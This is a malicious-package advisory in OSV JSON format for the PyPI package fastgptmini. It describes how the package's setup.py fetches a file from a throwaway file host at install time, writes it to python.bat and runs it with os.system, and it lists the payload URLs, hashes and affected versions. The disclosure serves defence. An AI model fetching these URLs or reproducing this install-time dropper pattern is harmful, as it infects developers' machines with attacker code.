{"id":"MAL-2026-5776","summary":"Malicious code in fastgptmini (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4da10d62527ca4b69f4458b6a01c77f01af42c5a1631d5cc6f207070d1ade20d)\nsetup.py fetches an opaque file from https://tmpfiles.org/dl/wJwhUXDhUK6M/zvgfsj.txt (an anonymous, throwaway file-sharing host) during `pip install`, writes the bytes to `python.bat` in the current working directory, and executes them via `os.system(\"cmd /c python.bat\")`. The URL is unpinned, no hash or signature verification is performed, the destination is not associated with the package publisher, and the fetched content is handed directly to a shell — a canonical install-time dropper. The package ships no real functionality (src/ contains only the egg-info directory) and uses placeholder metadata (Name/Author/Summary all set to 'FastGPTMini' with no homepage, URL, or email), consistent with a name-confusion lure targeting developers searching for FastGPT/GPT tooling. Any machine running `pip install FastGPTMini` will fetch and execute attacker-controlled code with the user's privileges.\n\n## Source: kam193 (3cca907106c3dceb5276e9bdbf8799367b44df9e12fe12098dd3ed215bb4f3b0)\nDuring installation, the code downloads an obfuscated script, which attempts to tamper with Defender exclusions paths and then downloads a malicious executable\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-fastgptmini\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - malware\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - obfuscation\n","modified":"2026-06-15T20:31:52.949884316Z","published":"2026-06-15T11:43:18Z","database_specific":{"iocs":{"urls":["https://tmpfiles.org/dl/wNwdULF0K8NS/vwchmx.txt","https://tmpfiles.org/dl/wowPUtiVvUPO/pythoninstallmanager.exe"]},"malicious-packages-origins":[{"modified_time":"2026-06-15T12:23:54.586979Z","sha256":"3cca907106c3dceb5276e9bdbf8799367b44df9e12fe12098dd3ed215bb4f3b0","source":"kam193","id":"pypi/2026-06-fastgptmini/fastgptmini","import_time":"2026-06-15T13:06:39.495068017Z","versions":["2.21","2.22","2.23","2.24","2.25","2.26"]},{"modified_time":"2026-06-15T19:39:35Z","id":"IN-MAL-2026-006679","source":"amazon-inspector","import_time":"2026-06-15T20:14:26.914309651Z","sha256":"28e21a2c3a141d093fb5d40a6cbf4af6a856d1e62e20d21040196f0f04046d7f","versions":["2.22"]},{"modified_time":"2026-06-15T19:55:46Z","id":"IN-MAL-2026-006693","source":"amazon-inspector","import_time":"2026-06-15T20:14:28.473782815Z","sha256":"4da10d62527ca4b69f4458b6a01c77f01af42c5a1631d5cc6f207070d1ade20d","versions":["2.26"]},{"modified_time":"2026-06-15T19:39:39Z","id":"IN-MAL-2026-006680","source":"amazon-inspector","import_time":"2026-06-15T20:14:27.050979451Z","sha256":"9d3e5a3d5306955d64796726515b3fbdc69c4a62764e8eee47f1e31a46b4e612","versions":["2.23"]},{"modified_time":"2026-06-15T19:39:35Z","sha256":"df96c79ac17a09accf2decd6e2be75665cd05dee4eb6f3fe1ee78eb1d6aae9c7","source":"amazon-inspector","id":"IN-MAL-2026-006678","import_time":"2026-06-15T20:14:26.788022703Z","versions":["2.21"]}]},"references":[{"type":"WEB","url":"https://www.virustotal.com/gui/file-analysis/ZjYxZmY4ZjFhNjIxMzI2ZTY1NmUxNThkMWNlYTE0M2M6MTc4MTUyMzQzMw=="},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/9e731bb85408c1b34c5f7fd6518b3590983ac5e95793dee0f1af390ac288ed47/detection"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/fastgptmini"},{"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.22/"},{"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.26/"},{"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.23/"},{"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.21/"}],"affected":[{"package":{"name":"fastgptmini","ecosystem":"PyPI","purl":"pkg:pypi/fastgptmini"},"versions":["2.21","2.22","2.23","2.24","2.25","2.26"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/fastgptmini/MAL-2026-5776.json","indicators":{"package_integrity":[{"hashes":{"md5":"36ffafaeb08cd85eafdb3fff1b7aa053","sha256":"0951171af0b78d98646657f3f98f80ddf51b13af91f60ebcb7341b635b55cf6b","blake2b_256":"d3d14c8dde385b27d5e2bf125e86aa05aa72baad390dfbaf13548530e844e09f"},"filename":"fastgptmini-2.26.tar.gz"}],"evidence_files":[{"sha256":"7bc82bfa873cf8b125fb9a41fcc3238f3a8ac037a66f48e766dc308bbfd7f71a","tlsh":"d1116347ddd2a69812e0644c98119850ffa0836b2a40888bf1bd827cbfb42e086374a8","path":"setup.py"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}